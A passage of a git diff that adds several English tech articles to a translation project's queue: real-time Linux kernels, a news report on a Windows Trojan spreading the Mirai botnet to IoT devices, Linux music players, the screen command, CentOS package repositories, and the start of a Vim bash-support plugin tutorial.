driven by the factory automation industry and is increasingly showing up in cars, trains, and planes. It’s not always a life-and-death situation, however -- financial services companies use RTL for high-frequency trading. + +Requirements for real-time include deterministic timing behavior, preemption, priority inheritance, and priority ceiling, said Altenberg. “The most important requirement is that a high-priority task always needs to be able to preempt a low-priority task.” + +Altenberg strongly recommended against using the term “soft real-time” to describe lightweight real-time solutions. “You can be deterministic or not, but there’s nothing in between.” + +### Dual-kernel Real-time + +Dual-kernel schemes like Xenomai and RTAI deploy a microkernel running in parallel with a separate Linux kernel, while single kernel schemes like RTL make Linux itself capable of real-time. “With dual-kernel, Linux can get some runtime when priority real-time applications aren’t running on the microkernel,” said Altenberg. “The problem is that someone needs to maintain the microkernel and support it on new hardware. This is a huge effort, and the development communities are not very big. Also, because Linux is not running directly on the hardware, you need a hardware abstraction layer (HAL). With two things to maintain, you’re usually a step behind mainline Linux development.” + +The challenge with RTL, and the reason it has taken so long to emerge, is that “to make Linux real-time you have to basically touch every file in the kernel,” said Altenberg. Yet, most of that work is already done and baked into mainline, and developers don’t need to maintain a microkernel or HAL. + +Altenberg went on to explain the differences between the RTAI and Xenomai. “With RTAI, you write a kernel module that is scheduled by a microkernel. It’s like kernel development -- really hard to get into it and hard to debug.” + +RTAI development can be further complicated because industrial customers often want to include closed source code along with GPL kernel code. “You have to decide which parts you can put into userland and which you put into the kernel with real-time approaches,” said Altenberg. + +RTAI also supports fewer hardware platforms than RTL, especially beyond x86\. The dual-kernel Xenomai, which has eclipsed RTAI as the dominant dual-kernel approach, has wider OS support than RTAI. More importantly, it offers “a proper solution for doing real-time in userspace,” said Altenberg. “To do this, they implemented the concept of skins -- an emulation layer for the APIs of different RTOSes, such as POSIX. This lets you reuse a subset of existing code from some RTOSes.” + +With Xenomai, however, you still need to maintain a separate microkernel and HAL. Limited development tools are another problem. “As with RTAI, you can’t use the standard C library,” said Altenberg. “You need special tools and libraries. Even for POSIX, you must link to the POSIX skin, which is much more complicated.” With either platform, he added, it’s hard to scale the microkernels beyond 8 to 16 CPUs to the big server clusters used in financial services. + +### Sleeping Spinlocks + +The dominant single-kernel solution is RTL, based on PREEMPT.RT, which was primarily developed by Thomas Gleixner and Ingo Molnár more than a decade ago. PREEMPT.RT reworks the kernel’s “spinlock” locking primitives to maximize the preemptible sections inside the Linux kernel. (PREEMPT.RT was originally called the Sleeping Spinlocks Patch.) + +Instead of running interrupt handlers in hard interrupt context, PREEMPT.RT runs them in kernel threads. “When an interrupt arrives, you don’t run the interrupt handler code,” said Altenberg. “You just wake up the corresponding kernel thread, which runs the handler. This has two advantages: The kernel thread becomes interruptible, and it shows up in the process list with a PID. So you can put a low priority on non-important interrupts and a higher priority on important userland tasks.” + +Because about 80 percent of PREEMPT.RT is already in mainline, any Linux developer can take advantage of PREEMPT.RT-originated kernel components such as timers, interrupt handlers, tracing infrastructure, and priority inheritance. “When they made Linux real-time, everything became preemptible, so we found a lot of race conditions and locking problems,” said Altenberg. “We fixed these and pushed them back into mainline to improve the stability of Linux in general.” + +Because RTL is primarily mainline Linux, “PREEMPT.RT is widely accepted and has a huge community,” said Altenberg. “If you write a real-time application, you don’t need to know much about PREEMPT.RT. You don’t need any special libraries or APIs, just a standard C library, a Linux driver, and POSIX app.” + +You still need to run a patch to use PREEMPT.RT, which is updated in every second Linux version. However, within two years, the remaining 20 percent of PREEMPT.RT should make it into Linux, so you “won’t need a patch.” + +Finally, Altenberg revealed the results of his Xenomai vs. RTL latency tests. “There are a lot of papers that claim that Xenomai and RTAI are way faster on latency than PREEMPT.RT,” said Altenberg. “But I figured out that most of the time PREEMPT.RT was poorly configured. So we brought in both a Xenomai expert and a PREEMPT.RT expert, and let them configure their own platforms.” + +While Xenomai performed better on most tests, and offered far less jitter, the differences were not as great as the 300 to 400 percent latency superiority claimed by some Xenomai boosters, said Altenberg. When tests were performed on userspace tasks -- which Altenberg says is the most real-world, and therefore the most important, test -- the worst-case reaction was about 90 to 95 microseconds for both Xenomai and RTL/PREEMPT.RT, he claimed. + +When they isolated a single CPU in the dual Cortex-A9 system for handling the interrupt in question, which Altenberg says is fairly common, PREEMPT.RT performed slightly better, coming in around 80 microseconds. (For more details, check out the video about 33 minutes in.) + +Altenberg acknowledges that his 12-hour test is the bare minimum, compared to OSADL’s two- to three-year tests, and that it is “not a mathematical proof.” In any case, he suggests that RTL deserves a handicap considering its easier development process. “In my opinion, it’s not fair to compare a full-featured Linux system with a microkernel,” he concluded. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/news/event/open-source-summit-na/2017/2/inside-real-time-linux + +作者:[ERIC BROWN][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/ericstephenbrown +[1]:https://www.linux.com/licenses/category/linux-foundation +[2]:https://www.linux.com/files/images/jan-altenberg-elcpng +[3]:https://www.linux.com/blog/intro-real-time-linux-embedded-developers +[4]:http://events.linuxfoundation.org/events/archive/2016/embedded-linux-conference-europe +[5]:https://linutronix.de/ +[6]:http://archive.linuxgizmos.com/celebrating-the-open-source-automation-development-labs-first-birthday/ +[7]:http://linuxgizmos.com/real-time-linux-shacks-up-with-the-linux-foundation/ +[8]:https://www.linux.com/news/embedded-linux-keeps-growing-amid-iot-disruption-says-study diff --git a/sources/tech/20170209 Windows Trojan hacks into embedded devices to install Mirai.md b/sources/tech/20170209 Windows Trojan hacks into embedded devices to install Mirai.md new file mode 100644 index 0000000000..7a3013609b --- /dev/null +++ b/sources/tech/20170209 Windows Trojan hacks into embedded devices to install Mirai.md @@ -0,0 +1,68 @@ +Windows Trojan hacks into embedded devices to install Mirai +============================================================ + +> The Trojan tries to authenticate over different protocols with factory default credentials and, if successful, deploys the Mirai bot + + + ![Windows Trojan uses brute-force attacks against IoT devices.](http://images.techhive.com/images/idgnsImport/2015/08/id-2956907-matrix-434036-100606417-large.jpg) + + +Attackers have started to use Windows and Android malware to hack into embedded devices, dispelling the widely held belief that if such devices are not directly exposed to the Internet they're less vulnerable. + +Researchers from Russian antivirus vendor Doctor Web have recently [come across a Windows Trojan program][21] that was designed to gain access to embedded devices using brute-force methods and to install the Mirai malware on them. + +Mirai is a malware program for Linux-based internet-of-things devices, such as routers, IP cameras, digital video recorders and others. It's used primarily to launch distributed denial-of-service (DDoS) attacks and spreads over Telnet by using factory device credentials. + +The Mirai botnet has been used to launch some of the largest DDoS attacks over the past six months. After [its source code was leaked][22], the malware was used to infect more than 500,000 devices. + +Once installed on a Windows computer, the new Trojan discovered by Doctor Web downloads a configuration file from a command-and-control server. That file contains a range of IP addresses to attempt authentication over several ports including 22 (SSH) and 23 (Telnet). + +#### [■ GET YOUR DAILY SECURITY NEWS: Sign up for CSO's security newsletters][11] + + +If authentication is successful, the malware executes certain commands specified in the configuration file, depending on the type of compromised system. In the case of Linux systems accessed via Telnet, the Trojan downloads and executes a binary package that then installs the Mirai bot. + +Many IoT vendors downplay the severity of vulnerabilities if the affected devices are not intended or configured for direct access from the Internet. This way of thinking assumes that LANs are trusted and secure environments. + +This was never really the case, with other threats like cross-site request forgery attacks going around for years. But the new Trojan that Doctor Web discovered appears to be the first Windows malware specifically designed to hijack embedded or IoT devices. + +This new Trojan found by Doctor Web, dubbed [Trojan.Mirai.1][23], shows that attackers can also use compromised computers to target IoT devices that are not directly accessible from the internet. + +Infected smartphones can be used in a similar way. Researchers from Kaspersky Lab have already [found an Android app][24] designed to perform brute-force password guessing attacks against routers over the local network. + +-------------------------------------------------------------------------------- + +via: http://www.csoonline.com/article/3168357/security/windows-trojan-hacks-into-embedded-devices-to-install-mirai.html + +作者:[ Lucian Constantin][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.csoonline.com/author/Lucian-Constantin/ +[1]:http://www.csoonline.com/article/3133744/internet-of-things/fasten-your-seatbelt-in-the-iot-cybersecurity-race.html +[2]:http://www.csoonline.com/article/3150881/internet-of-things/data-breaches-through-wearables-put-target-squarely-on-iot-in-2017.html +[3]:http://www.csoonline.com/article/3144197/security/upgraded-mirai-botnet-disrupts-deutsche-telekom-by-infecting-routers.html +[4]:http://www.csoonline.com/video/73795/security-sessions-the-csos-role-in-active-shooter-planning +[5]:http://www.idgnews.net/ +[6]:http://www.csoonline.com/article/3133744/internet-of-things/fasten-your-seatbelt-in-the-iot-cybersecurity-race.html +[7]:http://www.csoonline.com/article/3150881/internet-of-things/data-breaches-through-wearables-put-target-squarely-on-iot-in-2017.html +[8]:http://www.csoonline.com/article/3144197/security/upgraded-mirai-botnet-disrupts-deutsche-telekom-by-infecting-routers.html +[9]:http://www.csoonline.com/video/73795/security-sessions-the-csos-role-in-active-shooter-planning +[10]:http://www.csoonline.com/video/73795/security-sessions-the-csos-role-in-active-shooter-planning +[11]:http://csoonline.com/newsletters/signup.html#tk.cso-infsb +[12]:http://www.csoonline.com/author/Lucian-Constantin/ +[13]:https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F3168357%2Fsecurity%2Fwindows-trojan-hacks-into-embedded-devices-to-install-mirai.html&via=csoonline&text=Windows+Trojan+hacks+into+embedded+devices+to+install+Mirai +[14]:https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F3168357%2Fsecurity%2Fwindows-trojan-hacks-into-embedded-devices-to-install-mirai.html +[15]:http://www.linkedin.com/shareArticle?url=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F3168357%2Fsecurity%2Fwindows-trojan-hacks-into-embedded-devices-to-install-mirai.html&title=Windows+Trojan+hacks+into+embedded+devices+to+install+Mirai +[16]:https://plus.google.com/share?url=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F3168357%2Fsecurity%2Fwindows-trojan-hacks-into-embedded-devices-to-install-mirai.html +[17]:http://reddit.com/submit?url=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F3168357%2Fsecurity%2Fwindows-trojan-hacks-into-embedded-devices-to-install-mirai.html&title=Windows+Trojan+hacks+into+embedded+devices+to+install+Mirai +[18]:http://www.stumbleupon.com/submit?url=http%3A%2F%2Fwww.csoonline.com%2Farticle%2F3168357%2Fsecurity%2Fwindows-trojan-hacks-into-embedded-devices-to-install-mirai.html +[19]:http://www.csoonline.com/article/3168357/security/windows-trojan-hacks-into-embedded-devices-to-install-mirai.html#email +[20]:http://www.csoonline.com/author/Lucian-Constantin/ +[21]:https://news.drweb.com/news/?i=11140&lng=en +[22]:http://www.computerworld.com/article/3132359/security/hackers-create-more-iot-botnets-with-mirai-source-code.html +[23]:https://vms.drweb.com/virus/?_is=1&i=14934685 +[24]:https://securelist.com/blog/mobile/76969/switcher-android-joins-the-attack-the-router-club/ +[25]:http://www.csoonline.com/author/Lucian-Constantin/ diff --git a/sources/tech/20170210 5 Linux Music Players You Should Consider Switching To.md b/sources/tech/20170210 5 Linux Music Players You Should Consider Switching To.md new file mode 100644 index 0000000000..a5e735385b --- /dev/null +++ b/sources/tech/20170210 5 Linux Music Players You Should Consider Switching To.md @@ -0,0 +1,77 @@ +5 Linux Music Players You Should Consider Switching To +============================================================ + +![](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/02/linux-music-players.jpg "5 Linux Music Players You Should Consider Switching Tos") + + +There are dozens of Linux music players out there, and this makes it difficult to find the best one for our usage. In the past we’ve reviewed some of these players, such as [Cantata][10], [Exaile][11], or even [the lesser known ones][12] like Clementine, Nightingale and Quod Libet. + + +In this article I will be covering more music players for Linux that in some aspects are even better than the ones we’ve already told you about. + +### 1\. Qmmp + +[Qmmp][13] isn’t the most feature-rich (or stable) Linux music player, but it’s my favorite one, and this is why I put it as number one. I know there are better players, but I somehow just love this one and use it most of the time. It does crash, and there are many files it can’t play, but nevertheless I still love it the most. Go figure! + + ![linux-players-01-qmmp](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/02/Linux-players-01-Qmmp.jpg "linux-players-01-qmmp") + +Qmmp is a Winamp port for Linux. It’s (relatively) lightweight and has a decent feature set. Since I grew up with Winamp and loved its keyboard shortcuts, it was a nice surprise that they are present in the Linux version, too. As for formats, Qmmp plays most of the popular ones such as MPEG1 layer 2/3, Ogg Vorbis and Opus, Native FLAC/Ogg FLAC, Musepack, WavePack, tracker modules (mod, s3m, it, xm, etc.), ADTS AAC, CD Audio, WMA, Monkey’s Audio (and other formats provided by FFmpeg library), PCM WAVE (and other formats provided by libsndfile library), Midi, SID, and Chiptune formats (AY, GBS, GYM, HES, KSS, NSF, NSFE, SAP, SPC, VGM, VGZ, and VTX). + +### 2\. Amarok + +[Amarok][14] is the KDE music player, though you certainly can use it with any other desktop environment. It’s one of the oldest music players for Linux. This is probably one of the reasons why it’s a very popular player, though I personally don’t like it that much. + + ![linux-players-02-amarok](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/02/Linux-players-02-Amarok.jpg "linux-players-02-amarok") + +Amarok plays a huge array of music formats, but its main advantage is the abundance of plugins. The app comes with a lot of documentation, though it hasn’t been updated recently. Amarok is also famous for its integration with various web services such as Ampache, Jamendo Service, Last.fm, Librivox, MP3tunes, Magnatune, and OPML Podcast Directory. + +### 3\. Rhythmbox + +Now that I have mentioned Amarok and the KDE music player, now let’s move to [Rhythmbox][15], the default Gnome music player. Since it comes with Gnome, you can guess it’s a popular app. It’s not only a music player, but also a music management app. It supports MP3 and OGG, plus about a dozen other file formats, as well as Internet Radio, iPod integration, the playing of audio files, audio CD burning and playback, music sharing, and podcasts. All in all, it’s not a bad player, but this doesn’t mean you will like it the most. Try it and see if this is your player. If you don’t like it, just move on to the next option. + + ![linux-players-03-rhythmbox](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/02/Linux-players-03-Rhythmbox.jpg "linux-players-03-rhythmbox") + +### 4\. VLC + +Though [VLC][16] is best known as a movie player, it’s great as a music player, too, simply because it has the largest collection of codecs. If you can’t play a file with it, it’s unlikely you will be able to open it with any other player. VLC is highly customizable, and there are a lot of extensions for it. It runs on Windows, Linux, Mac OS X, Unix, iOS, Android, etc. + + ![linux-players-04-vlc](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/02/Linux-players-04-VLC.jpg "linux-players-04-vlc") + +What I personally don’t like about VLC is that it’s quite heavy on resources. Also, for some of the files I’ve used it with, the playback quality was far from stellar. The app would often shut down without any obvious reason while playing a file most of the other players wouldn’t struggle with, but it’s quite possible it’s not so much the player, as the file itself. Even though VLC isn’t among the apps I frequently use, I still wholeheartedly recommend it. + +### 5\. Cmus + +If you fancy command line apps, then [Cmus][17] is your Linux music player. You can use it to play Ogg Vorbis, MP3, FLAC, Opus, Musepack, WavPack, WAV, AAC, MP4, audio CD, everything supported by ffmpeg (WMA, APE, MKA, TTA, SHN, etc.) and libmodplug. You can also use it for streaming from Shoutcast or Icecast. It’s not the most feature-rich music player, but it has all the basics and beyond. Its main advantage is that it’s very lightweight, and its memory requirements are really minimal. + + ![linux-players-05-cmus](https://maketecheasier-2d0f.kxcdn.com/assets/uploads/2017/02/Linux-players-05-Cmus.jpg "linux-players-05-cmus") + +All these music players are great – in one aspect or another. I can’t say there is a best among them – this is largely a matter of personal taste and needs. Most of these apps either come installed by default in the distro or can be easily found in the package manager. Simply open Synaptic, Software Center, or whatever package manager your distro is using, search for them and install them from there. You can also use the command line, or simply double-click the install file you download from their site – the choice is yours. + +-------------------------------------------------------------------------------- + +via: https://www.maketecheasier.com/linux-music-players-to-check-out/ + +作者:[Ada Ivanova][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.maketecheasier.com/author/adaivanoff/ +[1]:https://www.maketecheasier.com/author/adaivanoff/ +[2]:https://www.maketecheasier.com/linux-music-players-to-check-out/#comments +[3]:https://www.maketecheasier.com/category/linux-tips/ +[4]:http://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.maketecheasier.com%2Flinux-music-players-to-check-out%2F +[5]:http://twitter.com/share?url=https%3A%2F%2Fwww.maketecheasier.com%2Flinux-music-players-to-check-out%2F&text=5+Linux+Music+Players+You+Should+Consider+Switching+To +[6]:mailto:?subject=5%20Linux%20Music%20Players%20You%20Should%20Consider%20Switching%20To&body=https%3A%2F%2Fwww.maketecheasier.com%2Flinux-music-players-to-check-out%2F +[7]:https://www.maketecheasier.com/mastering-disk-utility-mac/ +[8]:https://www.maketecheasier.com/airy-youtube-video-downloader/ +[9]:https://support.google.com/adsense/troubleshooter/1631343 +[10]:https://www.maketecheasier.com/cantata-new-music-player-for-linux/ +[11]:https://www.maketecheasier.com/exaile-the-first-media-player-i-dont-hate/ +[12]:https://www.maketecheasier.com/the-lesser-known-music-players-for-linux/ +[13]:http://qmmp.ylsoftware.com/ +[14]:https://amarok.kde.org/ +[15]:https://wiki.gnome.org/Apps/Rhythmbox +[16]:http://www.videolan.org/vlc/ +[17]:https://cmus.github.io/ diff --git a/sources/tech/20170210 Basic screen command usage and examples.md b/sources/tech/20170210 Basic screen command usage and examples.md new file mode 100644 index 0000000000..ded9b70f2f --- /dev/null +++ b/sources/tech/20170210 Basic screen command usage and examples.md @@ -0,0 +1,129 @@ +Basic screen command usage and examples +============================================================ + + + ![linux screen command usage and examples](https://www.rosehosting.com/blog/wp-content/uploads/2017/02/linux-screen-usage-examples.jpg) + +Screen is a very useful command that offers the ability to use multiple shell windows (sessions) from a single SSH session. When the session is detached or there is a network disruption, the process that is started in a screen session will still run and you can re-attach to the screen session at any time. This also comes in handy if you want to run a long process persistently or connect to shell sessions from multiple locations. + +In this article, we will show the basics of installing and using screen on a Linux VPS. + +### How to install screen + +Screen comes preinstalled on some of the popular distributions. You can check if it is installed on your server using the following command + +``` +screen -v +Screen version 4.00.03 (FAU) +``` + +If you do not have screen to the VPS, you can easily install it using the package manager provided by the OS. + +### [CentOS][4]/RedHat/Fedora + +``` +yum -y install screen +``` + +### [Ubuntu][5]/[Debian][6] + +``` +apt-get -y install screen +``` + +### How to start a screen session + +You can start screen by typing ‘screen’ at the command prompt and a new screen session will be started which looks the same as the command prompt + +``` +screen +``` + +It is a good practice to start screen sessions with descriptive names so you can easily remember which process is running in the session. To create a new session with a session name run the following command + +``` +screen -S name +``` + +and replace ‘name’ with a meaningful name for your session. + +### Detach from screen session + +To detach from the current screen session you can press ‘Ctrl-A‘ and ‘d‘ on your keyboard. All screen sessions will still be active and you can re-attach to them at any time later. + +### Reattach to screen session + +If you have detached from a session or your connection is interrupted for some reason, you can easily re-attach by executing the following command: + +``` +screen -r +``` + +If you have multiple screen sessions you can list them with ‘ls’ + +``` +screen -ls + +There are screens on: +7880.session    (Detached) +7934.session2   (Detached) +7907.session1   (Detached) +3 Sockets in /var/run/screen/S-root. +``` + +In our example, we have three active screen sessions. So, if you want to restore the session ‘session2’ you can execute + +``` +screen -r 7934 +``` + +or you can use the screen name + +``` +screen -r -S session2 +``` + +### Terminate screen session + +There are several ways to terminate the screen session. You can do it by pressing ‘Ctrl‘ + ‘d‘ on your keyboard or use the ‘exit’ command line command. + +To see all useful features of the screen command you can check screen’s man page. + +``` +man screen + +NAME +screen - screen manager with VT100/ANSI terminal emulation + +SYNOPSIS +screen [ -options ] [ cmd [ args ] ] +screen -r [[pid.]tty[.host]] +screen -r sessionowner/[[pid.]tty[.host]] +``` + +* * * + +Of course, you don’t have to do any of this if you use one of our [Linux VPS hosting][9] services, in which case you can simply ask our expert Linux admins to do this for you. They are available 24×7 and will take care of your request immediately. + +PS. If you liked this post please share it with your friends on the social networks using the buttons below or simply leave a comment in the comment section. Thanks. + +-------------------------------------------------------------------------------- + +via: https://www.rosehosting.com/blog/basic-screen-command-usage-and-examples/ + +作者:[rosehosting.com][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.rosehosting.com/blog/basic-screen-command-usage-and-examples/ +[1]:https://www.rosehosting.com/blog/basic-screen-command-usage-and-examples/ +[2]:https://www.rosehosting.com/blog/basic-screen-command-usage-and-examples/#comments +[3]:https://www.rosehosting.com/blog/category/tips-and-tricks/ +[4]:https://www.rosehosting.com/centos-vps.html +[5]:https://www.rosehosting.com/ubuntu-vps.html +[6]:https://www.rosehosting.com/debian-vps.html +[7]:https://plus.google.com/share?url=https://www.rosehosting.com/blog/basic-screen-command-usage-and-examples/ +[8]:http://www.linkedin.com/shareArticle?mini=true&url=https://www.rosehosting.com/blog/basic-screen-command-usage-and-examples/&title=Basic%20screen%20command%20usage%20and%20examples&summary=Screen%20is%20a%20very%20useful%20command%20that%20offers%20the%20ability%20to%20use%20multiple%20shell%20windows%20(sessions)%20from%20a%20single%20SSH%20session.%20When%20the%20session%20is%20detached%20or%20there%20is%20a%20network%20disruption,%20the%20process%20that%20is%20started%20in%20a%20screen%20session%20will%20still%20run%20and%20you%20can%20re-attach%20to%20the%20... +[9]:https://www.rosehosting.com/linux-vps-hosting.html diff --git a/sources/tech/20170210 Best Third-Party Repositories for CentOS.md b/sources/tech/20170210 Best Third-Party Repositories for CentOS.md new file mode 100644 index 0000000000..2e02d28b6b --- /dev/null +++ b/sources/tech/20170210 Best Third-Party Repositories for CentOS.md @@ -0,0 +1,108 @@ +Best Third-Party Repositories for CentOS +============================================================ + + + ![CentOS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/centos.png?itok=YRMQVk7U "CentOS") +>Get reliable up-to-date packages for CentOS from the Software Collections repository, EPEL, and Remi.[Creative Commons Attribution][1] + +Red Hat Enterprise Linux, in the grand tradition of enterprise software vendors, packages and supports old mold long after it should be dead and buried. They don't do this out of laziness, but because that is what their customers want. A lot of businesses view software the same way they see furniture: you buy a desk once and keep it forever, and software is just like a desk. + +CentOS, as a RHEL clone, suffers from this as well. Red Hat supports deprecated software that is no longer supported by upstream -- presumably patching security holes and keeping it working. But that is not good enough when you are running a software stack that requires newer versions. I have bumped into this numerous times running web servers on RHEL and CentOS. LAMP stacks are not forgiving, and every piece of the stack must be compatible with all of the others. For example, last year I had ongoing drama with RHEL/CentOS because version 6 shipped with PHP 5.3, and version 7 had PHP 5.4\. PHP 5.3 was end-of-life in August, 2014 and unsupported by upstream. PHP 5.4 went EOL in Sept. 2015, and 5.5 in July 2016\. MySQL, Python, and many other ancient packages that should be on display in museums as mummies also ship in these releases. + +So, what's a despairing admin to do? If you run both RHEL and CentOS turn first to the [Software Collections][3], as this is only Red Hat-supported source of updated packages. There is a Software Collections repository for CentOS, and installing and managing it is similar to any third-party repository, with a couple of unique twists. (If you're running RHEL, the procedure is different, as it is for all software management; you must do it [the RHEL way][4].) Software Collections also supports Fedora and Scientific Linux. + +### Installing Software Collections + +Install Software Collections on CentOS 6 and 7 with this command: + +``` +$ sudo yum install centos-release-scl +``` + +Then use Yum to search for and install packages in the usual way: + +``` +$ yum search php7 + [...] + rh-php70.x86_64 : Package that installs PHP 7.0 + [...] +$ sudo yum install rh-php70 +``` + +This may also pull in `centos-release-scl-rh` as a dependency. + +There is one more step, and that is enabling your new packages: + +``` +$ scl enable rh-php70 bash +$ php -v +PHP 7.0.10 +``` + +This runs a script that loads the new package and changes your environment, and you should see a change in your prompt. You must also install the appropriate connectors for the new package if necessary, for example for Python, PHP, and MySQL, and update configuration files (e.g., Apache) to use the new version. + +The SCL package will not be active after reboot. SCL is designed to run your old and new versions side-by-side and not overwrite your existing configurations. You can start your new packages automatically by sourcing their `enable` scripts in `.bashrc`. SCL installs everything into `opt`, so add this line to `.bashrc` for our PHP 7 example: + +``` +source /opt/rh/rh-php70/enable +``` + +It will automatically load and be available at startup, and you can go about your business cloaked in the warm glow of fresh up-to-date software. + +### Listing Available Packages + +So, what exactly do you get in Software Collections on CentOS? There are some extra community-maintained packages in `centos-release-scl`. You can see package lists in the [CentOS Wiki][5], or use Yum. First, let's see all our installed repos: + +``` +$ yum repolist +[...] +repo id repo name +base/7/x86_64 CentOS-7 - Base +centos-sclo-rh/x86_64 CentOS-7 - SCLo rh +centos-sclo-sclo/x86_64 CentOS-7 - SCLo sclo +extras/7/x86_64 CentOS-7 - Extras +updates/7/x86_64 CentOS-7 - Updates +``` + +Yum does not have a simple command to list packages in a single repo, so you have to do this: + +``` +$ yum --disablerepo "*" --enablerepo centos-sclo-rh \ + list available | less +``` + +This use of the `--disablerepo` and `--enablerepo` options is not well documented. You're not really disabling or enabling anything, but only limiting your search query to a single repo. It spits out a giant list of packages, and that is why we pipe it through `less`. + +### EPEL + +The excellent Fedora peoples maintain the [EPEL, Extra Packages for Enterprise Linux][6] repository for Fedora and all RHEL-compatible distributions. This contains updated package versions and software that is not included in the stock distributions. Install software from EPEL in the usual way, without having to bother with enable scripts. Specify that you want packages from EPEL using the `--disablerepo` and `--enablerepo` options: + +``` +$ sudo yum --disablerepo "*" --enablerepo epel install [package] +``` + +### Remi Collet + +Remi Collet maintains a large collection of updated and extra packages at [Remi's RPM repository][7]. Install EPEL first as Remi's repo depends on it. + +The CentOS wiki has a list of [additional third-party repositories][8] to use, and some to avoid. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/2/best-third-party-repositories-centos + +作者:[CARLA SCHRODER][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/cschroder +[1]:https://www.linux.com/licenses/category/creative-commons-attribution +[2]:https://www.linux.com/files/images/centospng +[3]:https://www.softwarecollections.org/en/ +[4]:https://access.redhat.com/solutions/472793 +[5]:https://wiki.centos.org/SpecialInterestGroup/SCLo/CollectionsList +[6]:https://fedoraproject.org/wiki/EPEL +[7]:http://rpms.remirepo.net/ +[8]:https://wiki.centos.org/AdditionalResources/Repositories diff --git a/sources/tech/20170210 How to Make Vim Editor as Bash-IDE Using bash-support Plugin in Linux.md b/sources/tech/20170210 How to Make Vim Editor as Bash-IDE Using bash-support Plugin in Linux.md new file mode 100644 index 0000000000..ff2fac9f86 --- /dev/null +++ b/sources/tech/20170210 How to Make Vim Editor as Bash-IDE Using bash-support Plugin in Linux.md @@ -0,0 +1,296 @@ +How to Make ‘Vim Editor’ as Bash-IDE Using ‘bash-support’ Plugin in Linux +============================================================ + +An IDE ([Integrated Development Environment][1]) is simply a software that offers much needed programming facilities and components in a single program, to maximize programmer productivity. IDEs put forward a single program in which all development can be done, enabling a programmer to write, modify, compile, deploy and debug programs. + +In this article, we will describe how to [install and configure Vim editor][2] as a Bash-IDE using bash-support vim plug-in. + +#### What is bash-support.vim plug-in? + +bash-support is a highly-customizable vim plug-in, which allows you to insert: file headers, complete statements, comments, functions, and code snippets. It also enables you to perform syntax checking, make a script executable, start a debugger simply with a keystroke; do all this without closing the editor. + +It generally makes bash scripting fun and enjoyable through organized and consistent writing/insertion of file content using shortcut keys (mappings). + +The current version plug-in is 4.3, version 4.0 was a rewriting of version 3.12.1; versions 4.0 or better, are based on a comprehensively new and more powerful template system, with changed template syntax unlike previous versions. + +### How To Install Bash-support Plug-in in Linux + +Start by downloading the latest version of bash-support plug-in using the command below: + +``` +$ cd Downloads +$ curl http://www.vim.org/scripts/download_script.php?src_id=24452 >bash-support.zip +``` + +Then install it as follows; create the `.vim` directory in your home folder (in case it doesn’t exist), move into it and extract the contents of bash-support.zip there: + +``` +$ mkdir ~/.vim +$ cd .vim +$ unzip ~/Downloads/bash-support.zip +``` + +Next, activate it from the `.vimrc` file: + +``` +$ vi ~/.vimrc +``` + +By inserting the line below: + +``` +filetype plug-in on +set number #optionally add this to show line numbers in vim +``` + +### How To Use Bash-support plug-in with Vim Editor + +To simplify its usage, the frequently used constructs as well as certain operations can be inserted/performed with key mappings respectively. The mappings are described in ~/.vim/doc/bashsupport.txt and ~/.vim/bash-support/doc/bash-hotkeys.pdf or ~/.vim/bash-support/doc/bash-hotkeys.tex files. + +##### Important: + +1. All mappings (`(\)+charater(s)` combination) are filetype specific: they are only work with ‘sh’ files, in order to avoid conflicts with mappings from other plug-ins. +2. Typing speed matters-when using key mapping, the combination of a leader `('\')` and the following character(s) will only be recognized for a short time (possibly less than 3 seconds – based on assumption). + +Below are certain remarkable features of this plug-in that we will explain and learn how to use: + +#### How To Generate an Automatic Header for New Scripts + +Look at the sample header below, to have this header created automatically in all your new bash scripts, follow the steps below. + +[ + ![Script Sample Header Options](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][3] + +Script Sample Header Options + +Start by setting your personal details (author name, author reference, organization, company etc). Use the map `\ntw` inside a Bash buffer (open a test script as the one below) to start the template setup wizard. + +Select option (1) to setup the personalization file, then press [Enter]. + +``` +$ vi test.sh +``` +[ + ![Set Personalizations in Scripts File](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][4] + +Set Personalizations in Scripts File + +Afterwards, hit [Enter] again. Then select the option (1) one more time to set the location of the personalization file and hit [Enter]. + +[ + ![Set Personalization File Location](http://www.tecmint.com/wp-content/plugins/lazy-load/images/1x1.trans.gif) +][5] + +Set Personalization File Location + +The wizard will copy the template file .vim/bash-support/rc/personal.templates to .vim/templates/personal.templates and open it for editing, where you can insert your details. + +Press `i` to insert the appropriate values within the single quotes as shown in the screenshot. + +[ + ![Add Info in 